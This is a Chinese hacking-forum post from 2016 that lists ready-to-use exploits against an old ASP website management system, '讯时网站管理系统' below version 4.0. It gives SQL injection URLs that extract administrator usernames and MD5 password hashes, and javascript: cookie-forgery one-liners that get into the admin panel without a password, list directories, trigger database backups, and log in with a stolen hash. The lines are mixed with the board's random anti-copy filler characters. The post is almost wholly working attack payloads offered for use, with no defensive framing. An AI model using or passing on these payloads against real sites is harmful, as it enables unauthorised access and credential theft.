找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1740|回复: 0

讯时网站管理系统4.0以下漏洞

[复制链接]
发表于 2016-5-11 14:55:08 | 显示全部楼层 |阅读模式
一、注入
# r0 E. \3 ~$ D( I; h/ @- K1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=25 m/ P, I4 X; a+ t( ], q

+ l& N" D4 Q) s) c- C) J2 s* O, k2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
/ n' b$ i( r9 J% R$ M第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin* I7 A7 e, S$ j: M8 G0 G* B, ~
可得到用户名和MD5加密码的密码。
5 N7 r& U( v! a% V" ]" [3 B$ x- Q' A4 y- v  Z4 K
二、cookies欺骗
4 S8 v0 M, l1 s
6 T9 m& A7 M9 L, L+ p) F. B1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. 7 r! d& |: t! [
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"3 H, c9 M# b$ r/ j( V' X+ r: a: ]; S
5 W9 n" @# a! S: w) e
2、列目录.
7 J/ N( u' b& l9 W. j( Xjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
& l) \7 d5 m6 S+ r' o% D( C" ~
" y' B, o5 d1 F2 c$ O3、数据库备份(适用性好像比较低.)
4 Q, o: ?- N9 O. P- ^javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
  b3 K  i) z4 _, U! B' f
- R, p: ~; m+ L( \* e0 l$ J3 d$ \4、得到MD5密码解不了密进后台方法
3 A5 T  `+ f/ t/ x; Sjavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"- n; A7 R- z: O2 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表